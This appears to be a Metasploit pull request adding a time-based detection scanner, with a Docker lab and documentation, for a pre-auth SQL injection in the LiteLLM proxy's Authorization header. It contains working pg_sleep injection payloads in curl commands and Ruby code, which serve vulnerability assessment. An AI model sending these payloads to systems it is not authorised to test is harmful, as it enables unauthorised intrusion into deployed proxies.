### PR TITLE
Add LiteLLM proxy pre-auth SQL injection scanner (CVE-2026-42208)

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/litellm_proxy_sqli.md
+++ b/documentation/modules/auxiliary/scanner/http/litellm_proxy_sqli.md
@@ -1,0 +1,175 @@
+## Vulnerable Application
+
+[LiteLLM](https://github.com/BerriAI/litellm) is an LLM gateway/proxy. Versions
+**1.81.16 through 1.83.6** are affected by
+[CVE-2026-42208](https://github.com/advisories/GHSA-r75f-5x8p-qvmc) (CVSS 9.3,
+on the CISA KEV list), an unauthenticated SQL injection.
+
+During API-key verification, the proxy interpolates the raw `Authorization`
+bearer value into a PostgreSQL query without parameterization:
+
+```sql
+WHERE v.token = '<bearer value>'
+```
+
+LiteLLM only SHA-256-hashes bearer tokens that begin with `sk-`. A bearer value
+that does **not** start with `sk-` is passed to the query verbatim, so a single
+quote breaks out of the string and injects. The lookup runs on the
+authentication-failure path, which is reachable **before** authentication. Fixed
+in **1.83.7** by switching to a parameterized query (commit `4dc416ee74`).
+
+This module confirms the flaw with a benign **time-based** check: a baseline
+request, a `pg_sleep` payload, a second baseline (which must return quickly), and
+a doubled `pg_sleep` payload. It reports the target vulnerable only when the
+injected delays **scale** with the requested sleep while the controls stay fast,
+so a server that is merely slow or degrading is not flagged. It never reads or
+exfiltrates data.
+
+Detection requires the target to have provisioned at least one virtual key (see
+Setup). The injectable predicate is a `WHERE` clause that PostgreSQL evaluates
+only against matching rows, so the time-based signal cannot fire against an empty
+token table. Any LiteLLM proxy in real use has issued keys, but a freshly
+initialized proxy with no keys may not respond to the probe.
+
+### Setup with Docker
+
+`litellm_config.yaml`:
+
+```yaml
+model_list:
+  - model_name: gpt-3.5-turbo
+    litellm_params:
+      model: huggingface/huggingface-model
+      api_key: os.environ/FAKE_API_KEY
+
+general_settings:
+  master_key: os.environ/LITELLM_MASTER_KEY
+  database_url: os.environ/DATABASE_URL
+```
+
+`docker-compose.yaml` (vulnerable — DB-backed mode is what creates the token table):
+
+```yaml
+services:
+  db:
+    image: postgres:16
+    environment:
+      POSTGRES_DB: litellm
+      POSTGRES_USER: litellm
+      POSTGRES_PASSWORD: litellm123
+    healthcheck:
+      test: ["CMD-SHELL", "pg_isready -U litellm"]
+      interval: 5s
+      retries: 5
+  litellm:
+    image: litellm/litellm:main-v1.83.3-stable   # vulnerable; use main-v1.83.7-stable for the patched run
+    command: ["--config", "/app/config.yaml", "--port", "4000"]
+    ports:
+      - "4000:4000"
+    volumes:
+      - ./litellm_config.yaml:/app/config.yaml:ro
+    depends_on:
+      db:
+        condition: service_healthy
+    environment:
+      DATABASE_URL: "postgresql://litellm:litellm123@db:5432/litellm"
+      LITELLM_MASTER_KEY: "sk-master-test-key-1234"
+```
+
+Start it and wait for the proxy to connect to PostgreSQL and apply its schema
+(the `litellm_proxy_extras` migration must finish before the token table exists;
+`/health/liveliness` is unauthenticated and returns 200 once the server listens):
+
+```
+docker compose up -d
+until curl -sf -o /dev/null http://localhost:4000/health/liveliness; do sleep 2; done
+```
+
+**Provision at least one virtual key.** The injectable predicate is a `WHERE`
+clause that PostgreSQL evaluates only against matching rows, so on a proxy whose
+`LiteLLM_VerificationToken` table is empty the `pg_sleep` never executes and the
+target appears (falsely) safe. Any proxy in real use has issued keys; for the lab,
+create one with the master key:
+
+```
+curl -s -X POST http://localhost:4000/key/generate \
+  -H 'Authorization: Bearer sk-master-test-key-1234' \
+  -H 'Content-Type: application/json' -d '{}'
+```
+
+Demonstrate the delay (control vs `pg_sleep(5)`):
+
+```
+curl -s -o /dev/null -w 'control: %{time_total}s\n' -X POST http://localhost:4000/v1/chat/completions \
+  -H 'Content-Type: application/json' -H 'Authorization: Bearer AAAA-control' \
+  -d '{"model":"gpt-3.5-turbo","messages":[{"role":"user","content":"x"}],"max_tokens":1}'
+
+curl -s -o /dev/null -w 'inject:  %{time_total}s\n' --max-time 30 -X POST http://localhost:4000/v1/chat/completions \
+  -H 'Content-Type: application/json' \
+  -H "Authorization: Bearer ' OR (SELECT pg_sleep(5)) IS NULL --" \
+  -d '{"model":"gpt-3.5-turbo","messages":[{"role":"user","content":"x"}],"max_tokens":1}'
+```
+
+Vulnerable: `control` ~0.03s, `inject` ~5s. Re-run with the `main-v1.83.7-stable`
+image for the patched (true-negative) case — both return fast.
+
+## Verification Steps
+
+1. Start a vulnerable LiteLLM proxy with a PostgreSQL backend (see Setup with Docker)
+1. Start `msfconsole`
+1. Do: `use auxiliary/scanner/http/litellm_proxy_sqli`
+1. Do: `set RHOSTS <target>`
+1. Do: `set RPORT 4000`
+1. Do: `run`
+1. The module reports the injection when the response time scales with `pg_sleep`
+
+## Options
+
+### TARGETURI
+
+The LiteLLM chat completions endpoint that triggers key verification. Defaults to
+`/v1/chat/completions`.
+
+### SLEEP
+
+Base `pg_sleep` delay in seconds. The module also probes at `2 x SLEEP` and
+requires the delay to scale while two control requests stay fast. Because it
+issues several timed requests, a run takes roughly `3 x SLEEP` seconds per host.
+Default `5`.
+
+### MODEL
+
+The `model` field placed in the request body. It need not be a real model — the
+key lookup fails before model dispatch. Default `gpt-3.5-turbo`.
+
+## Scenarios
+
+Captured against the Docker lab above (vulnerable `main-v1.83.3-stable` on 4000,
+patched `main-v1.83.7-stable` on 4001), each with one provisioned virtual key.
+
+### LiteLLM 1.83.3 (vulnerable)
+
+```
+msf6 > use auxiliary/scanner/http/litellm_proxy_sqli
+msf6 auxiliary(scanner/http/litellm_proxy_sqli) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 auxiliary(scanner/http/litellm_proxy_sqli) > set RPORT 4000
+RPORT => 4000
+msf6 auxiliary(scanner/http/litellm_proxy_sqli) > run
+
+[+] 127.0.0.1:4000        - LiteLLM pre-auth SQL injection confirmed (CVE-2026-42208): controls 0.06s/0.07s, pg_sleep(5)=5.05s, pg_sleep(10)=10.04s
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### LiteLLM 1.83.7 (patched, true-negative)
+
+```
+msf6 auxiliary(scanner/http/litellm_proxy_sqli) > set RPORT 4001
+RPORT => 4001
+msf6 auxiliary(scanner/http/litellm_proxy_sqli) > run
+
+[*] 127.0.0.1:4001        - Not vulnerable (pg_sleep(5) returned in 0.02s vs baseline 0.01s)
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/documentation/modules/auxiliary/scanner/http/litellm_proxy_sqli.md
+++ b/documentation/modules/auxiliary/scanner/http/litellm_proxy_sqli.md
@@ -18,12 +18,13 @@ quote breaks out of the string and injects. The lookup runs on the
 authentication-failure path, which is reachable **before** authentication. Fixed
 in **1.83.7** by switching to a parameterized query (commit `4dc416ee74`).
 
-This module confirms the flaw with a benign **time-based** check: a baseline
-request, a `pg_sleep` payload, a second baseline (which must return quickly), and
-a doubled `pg_sleep` payload. It reports the target vulnerable only when the
-injected delays **scale** with the requested sleep while the controls stay fast,
-so a server that is merely slow or degrading is not flagged. It never reads or
-exfiltrates data.
+This module confirms the flaw with a benign **time-based** check built on the
+framework's PostgreSQL time-based blind SQL injection library
+(`Msf::Exploit::SQLi::PostgreSQLi::TimeBasedBlind`). It issues one request whose
+injected predicate calls `pg_sleep` only when a tautology is true and a second
+request whose predicate never sleeps, and reports the target vulnerable only when
+the first is delayed while the second returns promptly. A server that is merely
+slow delays both requests and is not flagged. It never reads or exfiltrates data.
 
 Detection requires the target to have provisioned at least one virtual key (see
 Setup). The injectable predicate is a `WHERE` clause that PostgreSQL evaluates
@@ -130,17 +131,16 @@ image for the patched (true-negative) case — both return fast.
 The LiteLLM chat completions endpoint that triggers key verification. Defaults to
 `/v1/chat/completions`.
 
-### SLEEP
-
-Base `pg_sleep` delay in seconds. The module also probes at `2 x SLEEP` and
-requires the delay to scale while two control requests stay fast. Because it
-issues several timed requests, a run takes roughly `3 x SLEEP` seconds per host.
-Default `5`.
-
 ### MODEL
 
 The `model` field placed in the request body. It need not be a real model — the
 key lookup fails before model dispatch. Default `gpt-3.5-turbo`.
+
+### SqliDelay
+
+Advanced option from the framework SQL injection mixin: the number of seconds the
+injected `pg_sleep` runs for the time-based check. A higher value is more robust
+against network jitter at the cost of a slower scan. Default `5.0`.
 
 ## Scenarios
 
@@ -157,7 +157,7 @@ msf6 auxiliary(scanner/http/litellm_proxy_sqli) > set RPORT 4000
 RPORT => 4000
 msf6 auxiliary(scanner/http/litellm_proxy_sqli) > run
 
-[+] 127.0.0.1:4000        - LiteLLM pre-auth SQL injection confirmed (CVE-2026-42208): controls 0.06s/0.07s, pg_sleep(5)=5.05s, pg_sleep(10)=10.04s
+[+] 127.0.0.1:4000        - The target is vulnerable. Time-based SQL injection via Authorization header confirmed (LiteLLM 1.83.3)
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
 ```
@@ -169,7 +169,7 @@ msf6 auxiliary(scanner/http/litellm_proxy_sqli) > set RPORT 4001
 RPORT => 4001
 msf6 auxiliary(scanner/http/litellm_proxy_sqli) > run
 
-[*] 127.0.0.1:4001        - Not vulnerable (pg_sleep(5) returned in 0.02s vs baseline 0.01s)
+[*] 127.0.0.1:4001        - The target is not exploitable. No time-based SQL injection signal observed
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
 ```

--- a/modules/auxiliary/scanner/http/litellm_proxy_sqli.rb
+++ b/modules/auxiliary/scanner/http/litellm_proxy_sqli.rb
@@ -1,0 +1,185 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'BerriAI LiteLLM Proxy Pre-Auth SQL Injection Scanner',
+        'Description' => %q{
+          This module detects BerriAI LiteLLM proxy servers affected by
+          CVE-2026-42208, an unauthenticated SQL injection. During API-key
+          verification the proxy interpolates the raw Authorization bearer value
+          into a PostgreSQL query (WHERE v.token = '<token>') without
+          parameterization. Because LiteLLM only hashes tokens that begin with
+          "sk-", a bearer value that does not start with "sk-" reaches the query
+          verbatim and is injectable. The failure path that performs the lookup is
+          reachable before authentication. Affected versions are 1.81.16 through
+          1.83.6 (fixed in 1.83.7).
+
+          The module confirms the flaw with a benign time-based check. It sends a
+          baseline request, a bearer carrying a pg_sleep payload, a second baseline
+          (which must return quickly), and a bearer carrying a doubled pg_sleep
+          payload. It reports the target vulnerable only when the injected delays
+          scale with the requested sleep while the controls stay fast, so a server
+          that is merely slow is not flagged. It does not read or exfiltrate data.
+
+          Detection requires the target to have provisioned at least one virtual
+          key. The injectable predicate sits in a WHERE clause that PostgreSQL
+          evaluates only against matching rows, so when the token table is empty
+          the pg_sleep never executes and the proxy appears (falsely) safe. Any
+          LiteLLM proxy in real use has issued keys; a freshly initialized proxy
+          with an empty token table may not respond to the time-based probe.
+        },
+        'Author' => [
+          'Tencent YunDing Security Lab', # vulnerability discovery
+          'Kenneth LaCroix' # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2026-42208'],
+          ['GHSA', 'r75f-5x8p-qvmc'],
+          ['URL', 'https://bishopfox.com/blog/cve-2026-42208-pre-authentication-sql-injection-in-litellm-proxy']
+        ],
+        'DisclosureDate' => '2026-04-20',
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        },
+        'DefaultOptions' => { 'RPORT' => 4000, 'SSL' => false }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The LiteLLM chat completions endpoint', '/v1/chat/completions']),
+        OptInt.new('SLEEP', [true, 'Base pg_sleep delay in seconds for the time-based check', 5]),
+        OptString.new('MODEL', [true, 'Model name placed in the request body (need not be a real model)', 'gpt-3.5-turbo'])
+      ]
+    )
+  end
+
+  def effective_sleep
+    [datastore['SLEEP'].to_i, 1].max
+  end
+
+  # Subquery-wrapped pg_sleep: pg_sleep() returns void, which cannot sit in a
+  # bare boolean OR; wrapping it in a subquery keeps the predicate valid.
+  def sleep_payload(seconds)
+    "' OR (SELECT 1 FROM (SELECT pg_sleep(#{seconds})) t) IS NOT NULL--"
+  end
+
+  # Send the chat-completions request with the given bearer value and return
+  # [response, elapsed_seconds]. Elapsed is measured with the monotonic clock so
+  # it is unaffected by wall-clock adjustments, and includes network RTT (which
+  # cancels out in the differential comparison).
+  def timed_request(bearer)
+    body = {
+      'model' => datastore['MODEL'],
+      'messages' => [{ 'role' => 'user', 'content' => 'x' }],
+      'max_tokens' => 1
+    }.to_json
+    started = Process.clock_gettime(Process::CLOCK_MONOTONIC)
+    res = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path),
+        'ctype' => 'application/json',
+        'headers' => { 'Authorization' => "Bearer #{bearer}" },
+        'data' => body
+      },
+      effective_sleep * 2 + 20
+    )
+    [res, Process.clock_gettime(Process::CLOCK_MONOTONIC) - started]
+  end
+
+  def control_token
+    "control-#{Rex::Text.rand_text_alpha(8)}"
+  end
+
+  # Best-effort fingerprint via the unauthenticated /health endpoint.
+  def fingerprint
+    res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri('health'))
+    return nil unless res
+
+    key = res.headers.keys.find { |k| k.casecmp?('x-litellm-version') }
+    return "LiteLLM #{res.headers[key]}" if key
+    return 'LiteLLM /health' if res.code == 200
+
+    nil
+  end
+
+  # Core time-based probe. Returns a result hash.
+  def probe
+    n = effective_sleep
+    n2 = n * 2
+    fp = fingerprint
+
+    c1_res, c1 = timed_request(control_token)
+    return { error: 'No response to the baseline request', fp: fp } unless c1_res
+
+    _a_res, t_a = timed_request(sleep_payload(n))
+    return { vulnerable: false, reason: :no_delay, c1: c1, t_a: t_a, n: n, fp: fp } unless t_a >= c1 + n * 0.6
+
+    # A control taken right after the sleep payload must still be fast. If it is
+    # also slow, the target is generally slow/degrading rather than executing our
+    # pg_sleep, so we do not flag it.
+    c2_res, c2 = timed_request(control_token)
+    return { vulnerable: false, reason: :no_baseline, c1: c1, t_a: t_a, n: n, fp: fp } unless c2_res
+    return { vulnerable: false, reason: :unstable, c1: c1, c2: c2, t_a: t_a, n: n, fp: fp } unless c2 <= c1 + n * 0.5
+
+    # Doubling the requested sleep must roughly double the added delay.
+    _b_res, t_b = timed_request(sleep_payload(n2))
+    scaled = (t_b - t_a) >= n * 0.6
+    { vulnerable: scaled, reason: (scaled ? :confirmed : :no_scaling), c1: c1, c2: c2, t_a: t_a, t_b: t_b, n: n, n2: n2, fp: fp }
+  end
+
+  def check_host(_ip)
+    r = probe
+    return Exploit::CheckCode::Unknown(r[:error]) if r[:error]
+    return Exploit::CheckCode::Safe('No pg_sleep-scaled delay was observed') unless r[:vulnerable]
+
+    Exploit::CheckCode::Vulnerable("Time-based SQLi: pg_sleep(#{r[:n]})=#{r[:t_a].round(2)}s, pg_sleep(#{r[:n2]})=#{r[:t_b].round(2)}s, controls #{r[:c1].round(2)}s/#{r[:c2].round(2)}s")
+  end
+
+  def run_host(_ip)
+    r = probe
+    if r[:error]
+      vprint_error("#{peer} - #{r[:error]}")
+      return
+    end
+
+    vprint_status("#{peer} - Baseline #{r[:c1].round(2)}s#{r[:fp] ? " (#{r[:fp]})" : ''}")
+
+    unless r[:vulnerable]
+      case r[:reason]
+      when :no_delay
+        print_status("#{peer} - Not vulnerable (pg_sleep(#{r[:n]}) returned in #{r[:t_a].round(2)}s vs baseline #{r[:c1].round(2)}s)")
+      when :unstable
+        print_status("#{peer} - Inconclusive: target is generally slow (post-control #{r[:c2].round(2)}s vs baseline #{r[:c1].round(2)}s); not a clean pg_sleep signal")
+      when :no_scaling
+        print_status("#{peer} - Inconclusive: delay did not scale with pg_sleep (#{r[:t_a].round(2)}s at #{r[:n]}s, #{r[:t_b].round(2)}s at #{r[:n2]}s)")
+      else
+        print_status("#{peer} - Not vulnerable")
+      end
+      return
+    end
+
+    print_good("#{peer} - LiteLLM pre-auth SQL injection confirmed (CVE-2026-42208): controls #{r[:c1].round(2)}s/#{r[:c2].round(2)}s, pg_sleep(#{r[:n]})=#{r[:t_a].round(2)}s, pg_sleep(#{r[:n2]})=#{r[:t_b].round(2)}s#{r[:fp] ? "; #{r[:fp]}" : ''}")
+    report_vuln(
+      host: rhost,
+      port: rport,
+      name: name,
+      info: "Time-based blind SQLi via Authorization header; pg_sleep(#{r[:n]})=#{r[:t_a].round(2)}s vs baseline #{r[:c1].round(2)}s",
+      refs: references
+    )
+  end
+end

--- a/modules/auxiliary/scanner/http/litellm_proxy_sqli.rb
+++ b/modules/auxiliary/scanner/http/litellm_proxy_sqli.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpClient
   include Msf::Auxiliary::Scanner
   include Msf::Auxiliary::Report
+  include Msf::Exploit::SQLi
 
   def initialize(info = {})
     super(
@@ -24,12 +25,13 @@ class MetasploitModule < Msf::Auxiliary
           reachable before authentication. Affected versions are 1.81.16 through
           1.83.6 (fixed in 1.83.7).
 
-          The module confirms the flaw with a benign time-based check. It sends a
-          baseline request, a bearer carrying a pg_sleep payload, a second baseline
-          (which must return quickly), and a bearer carrying a doubled pg_sleep
-          payload. It reports the target vulnerable only when the injected delays
-          scale with the requested sleep while the controls stay fast, so a server
-          that is merely slow is not flagged. It does not read or exfiltrate data.
+          The module confirms the flaw with a benign time-based check built on the
+          framework's PostgreSQL time-based blind SQL injection library. It issues a
+          request whose injected predicate sleeps only when a tautology is true and a
+          second request whose predicate never sleeps, and reports the target
+          vulnerable only when the first is delayed while the second returns promptly.
+          A server that is merely slow delays both requests and is not flagged. The
+          module does not read or exfiltrate data.
 
           Detection requires the target to have provisioned at least one virtual
           key. The injectable predicate sits in a WHERE clause that PostgreSQL
@@ -61,48 +63,18 @@ class MetasploitModule < Msf::Auxiliary
     register_options(
       [
         OptString.new('TARGETURI', [true, 'The LiteLLM chat completions endpoint', '/v1/chat/completions']),
-        OptInt.new('SLEEP', [true, 'Base pg_sleep delay in seconds for the time-based check', 5]),
         OptString.new('MODEL', [true, 'Model name placed in the request body (need not be a real model)', 'gpt-3.5-turbo'])
       ]
     )
-  end
 
-  def effective_sleep
-    [datastore['SLEEP'].to_i, 1].max
-  end
-
-  # Subquery-wrapped pg_sleep: pg_sleep() returns void, which cannot sit in a
-  # bare boolean OR; wrapping it in a subquery keeps the predicate valid.
-  def sleep_payload(seconds)
-    "' OR (SELECT 1 FROM (SELECT pg_sleep(#{seconds})) t) IS NOT NULL--"
-  end
-
-  # Send the chat-completions request with the given bearer value and return
-  # [response, elapsed_seconds]. Elapsed is measured with the monotonic clock so
-  # it is unaffected by wall-clock adjustments, and includes network RTT (which
-  # cancels out in the differential comparison).
-  def timed_request(bearer)
-    body = {
-      'model' => datastore['MODEL'],
-      'messages' => [{ 'role' => 'user', 'content' => 'x' }],
-      'max_tokens' => 1
-    }.to_json
-    started = Process.clock_gettime(Process::CLOCK_MONOTONIC)
-    res = send_request_cgi(
-      {
-        'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path),
-        'ctype' => 'application/json',
-        'headers' => { 'Authorization' => "Bearer #{bearer}" },
-        'data' => body
-      },
-      effective_sleep * 2 + 20
+    # Msf::Exploit::SQLi registers SqliDelay with a 1.0s default. A single second
+    # is easily lost in network jitter for a remote time-based check, so raise the
+    # default to give a clearer signal while still letting the user tune it.
+    register_advanced_options(
+      [
+        OptFloat.new('SqliDelay', [false, 'Seconds to pg_sleep for the time-based check', 5.0])
+      ]
     )
-    [res, Process.clock_gettime(Process::CLOCK_MONOTONIC) - started]
-  end
-
-  def control_token
-    "control-#{Rex::Text.rand_text_alpha(8)}"
   end
 
   # Best-effort fingerprint via the unauthenticated /health endpoint.
@@ -117,68 +89,63 @@ class MetasploitModule < Msf::Auxiliary
     nil
   end
 
-  # Core time-based probe. Returns a result hash.
-  def probe
-    n = effective_sleep
-    n2 = n * 2
-    fp = fingerprint
+  # pg_sleep is evaluated once per matching row, so a populated token table can
+  # delay the response by several multiples of SqliDelay; add a fixed margin for
+  # the network round-trip on top of that.
+  def request_timeout
+    (datastore['SqliDelay'] * 4 + 20).ceil
+  end
 
-    c1_res, c1 = timed_request(control_token)
-    return { error: 'No response to the baseline request', fp: fp } unless c1_res
-
-    _a_res, t_a = timed_request(sleep_payload(n))
-    return { vulnerable: false, reason: :no_delay, c1: c1, t_a: t_a, n: n, fp: fp } unless t_a >= c1 + n * 0.6
-
-    # A control taken right after the sleep payload must still be fast. If it is
-    # also slow, the target is generally slow/degrading rather than executing our
-    # pg_sleep, so we do not flag it.
-    c2_res, c2 = timed_request(control_token)
-    return { vulnerable: false, reason: :no_baseline, c1: c1, t_a: t_a, n: n, fp: fp } unless c2_res
-    return { vulnerable: false, reason: :unstable, c1: c1, c2: c2, t_a: t_a, n: n, fp: fp } unless c2 <= c1 + n * 0.5
-
-    # Doubling the requested sleep must roughly double the added delay.
-    _b_res, t_b = timed_request(sleep_payload(n2))
-    scaled = (t_b - t_a) >= n * 0.6
-    { vulnerable: scaled, reason: (scaled ? :confirmed : :no_scaling), c1: c1, c2: c2, t_a: t_a, t_b: t_b, n: n, n2: n2, fp: fp }
+  # Builds the time-based blind SQLi probe. The framework library hands our block
+  # the boolean predicate to test; we break out of the WHERE v.token = '<token>'
+  # string literal, OR in that predicate, and comment out the trailing quote. A
+  # bearer that does not begin with "sk-" is interpolated verbatim, so the quote
+  # reaches the query and the injection lands. The random suffix sits inside the
+  # SQL comment (so it is inert) but makes every bearer unique, which defeats
+  # LiteLLM's in-memory API-key auth cache: a repeated token would otherwise be
+  # served from cache and skip the database, suppressing the pg_sleep.
+  def create_litellm_sqli
+    create_sqli(dbms: PostgreSQLi::TimeBasedBlind) do |payload|
+      body = {
+        'model' => datastore['MODEL'],
+        'messages' => [{ 'role' => 'user', 'content' => 'x' }],
+        'max_tokens' => 1
+      }.to_json
+      send_request_cgi(
+        {
+          'method' => 'POST',
+          'uri' => normalize_uri(target_uri.path),
+          'ctype' => 'application/json',
+          'headers' => { 'Authorization' => "Bearer ' OR #{payload}-- #{Rex::Text.rand_text_alphanumeric(8)}" },
+          'data' => body
+        },
+        request_timeout
+      )
+    end
   end
 
   def check_host(_ip)
-    r = probe
-    return Exploit::CheckCode::Unknown(r[:error]) if r[:error]
-    return Exploit::CheckCode::Safe('No pg_sleep-scaled delay was observed') unless r[:vulnerable]
-
-    Exploit::CheckCode::Vulnerable("Time-based SQLi: pg_sleep(#{r[:n]})=#{r[:t_a].round(2)}s, pg_sleep(#{r[:n2]})=#{r[:t_b].round(2)}s, controls #{r[:c1].round(2)}s/#{r[:c2].round(2)}s")
+    fp = fingerprint
+    if create_litellm_sqli.test_vulnerable
+      Exploit::CheckCode::Vulnerable("Time-based SQL injection via Authorization header confirmed#{fp ? " (#{fp})" : ''}")
+    else
+      Exploit::CheckCode::Safe('No time-based SQL injection signal observed')
+    end
   end
 
-  def run_host(_ip)
-    r = probe
-    if r[:error]
-      vprint_error("#{peer} - #{r[:error]}")
+  def run_host(ip)
+    code = check_host(ip)
+    unless code == Exploit::CheckCode::Vulnerable
+      print_status("#{peer} - #{code.message}")
       return
     end
 
-    vprint_status("#{peer} - Baseline #{r[:c1].round(2)}s#{r[:fp] ? " (#{r[:fp]})" : ''}")
-
-    unless r[:vulnerable]
-      case r[:reason]
-      when :no_delay
-        print_status("#{peer} - Not vulnerable (pg_sleep(#{r[:n]}) returned in #{r[:t_a].round(2)}s vs baseline #{r[:c1].round(2)}s)")
-      when :unstable
-        print_status("#{peer} - Inconclusive: target is generally slow (post-control #{r[:c2].round(2)}s vs baseline #{r[:c1].round(2)}s); not a clean pg_sleep signal")
-      when :no_scaling
-        print_status("#{peer} - Inconclusive: delay did not scale with pg_sleep (#{r[:t_a].round(2)}s at #{r[:n]}s, #{r[:t_b].round(2)}s at #{r[:n2]}s)")
-      else
-        print_status("#{peer} - Not vulnerable")
-      end
-      return
-    end
-
-    print_good("#{peer} - LiteLLM pre-auth SQL injection confirmed (CVE-2026-42208): controls #{r[:c1].round(2)}s/#{r[:c2].round(2)}s, pg_sleep(#{r[:n]})=#{r[:t_a].round(2)}s, pg_sleep(#{r[:n2]})=#{r[:t_b].round(2)}s#{r[:fp] ? "; #{r[:fp]}" : ''}")
+    print_good("#{peer} - #{code.message}")
     report_vuln(
       host: rhost,
       port: rport,
       name: name,
-      info: "Time-based blind SQLi via Authorization header; pg_sleep(#{r[:n]})=#{r[:t_a].round(2)}s vs baseline #{r[:c1].round(2)}s",
+      info: 'Time-based blind SQLi via Authorization header (pg_sleep)',
       refs: references
     )
   end


### PR DESCRIPTION
## Summary

Adds `auxiliary/scanner/http/litellm_proxy_sqli`, a detection module for
[CVE-2026-42208](https://github.com/advisories/GHSA-r75f-5x8p-qvmc) (CVSS 9.3,
on the CISA KEV list) — a pre-authentication SQL injection in
[BerriAI LiteLLM](https://github.com/BerriAI/litellm) proxy.

## Vulnerability

During API-key verification the proxy interpolates the raw `Authorization` bearer
value into a PostgreSQL query without parameterization:

```sql
WHERE v.token = ''
```

LiteLLM only SHA-256-hashes bearer tokens that begin with `sk-`; a value that does
not start with `sk-` reaches the query verbatim, so a single quote breaks out of
the string literal. The lookup runs on the authentication-failure path, which is
reachable before authentication. Affected versions are `1.81.16` through `1.83.6`;
fixed in `1.83.7` by switching to a parameterized query (commit `4dc416ee74`).

## What the module does

This is a **detection** module. It confirms the flaw with a benign **time-based**
check built on the framework's PostgreSQL time-based blind SQLi library
(`PostgreSQLi::TimeBasedBlind` via `create_sqli` + `test_vulnerable`) and never
reads or exfiltrates data.

The library issues a true/false request pair through the injectable `Authorization`
bearer: one whose injected predicate calls `pg_sleep(SqliDelay)` only when a
tautology is true, and one whose predicate never sleeps. The target is reported
vulnerable only when the true case is delayed by ~`SqliDelay` while the false case
returns promptly, so a server that is merely slow (which delays both) is not
flagged. `SqliDelay` defaults to 5.0s (raised from the library default) for a
clearer remote signal.

**Detection requirement:** the injectable predicate is a `WHERE` clause PostgreSQL
evaluates per matching row, so the time-based signal only fires when the target has
provisioned at least one virtual key (a non-empty token table). This is the case
for any LiteLLM proxy in real use; a freshly initialized proxy with no keys may not
respond. The limitation is documented in the module and the docs.

## Verification

Tested against the official images — vulnerable `main-v1.83.3-stable` and patched
`main-v1.83.7-stable`, each with a PostgreSQL backend and one provisioned virtual
key:

```
msf6 auxiliary(scanner/http/litellm_proxy_sqli) > set RPORT 4000   # 1.83.3
msf6 auxiliary(scanner/http/litellm_proxy_sqli) > run
[+] 127.0.0.1:4000        - Time-based SQL injection via Authorization header confirmed (LiteLLM 1.83.3)

msf6 auxiliary(scanner/http/litellm_proxy_sqli) > set RPORT 4001   # 1.83.7 (patched)
msf6 auxiliary(scanner/http/litellm_proxy_sqli) > run
[*] 127.0.0.1:4001        - No time-based SQL injection signal observed
```

`check` returns `Vulnerable` / `Safe` respectively. The module also degrades cleanly
(reports not vulnerable, no errors) against a non-LiteLLM HTTP server and against a
vulnerable proxy whose token table is empty.

Documentation with the full Docker lab setup and scenarios is included at
`documentation/modules/auxiliary/scanner/http/litellm_proxy_sqli.md`.

## Verification Steps

1. Start a vulnerable LiteLLM proxy with a PostgreSQL backend and provision one key (see docs)
2. `use auxiliary/scanner/http/litellm_proxy_sqli`
3. `set RHOSTS `
4. `run` — the module reports the injection when the injected predicate sleeps on true but not on false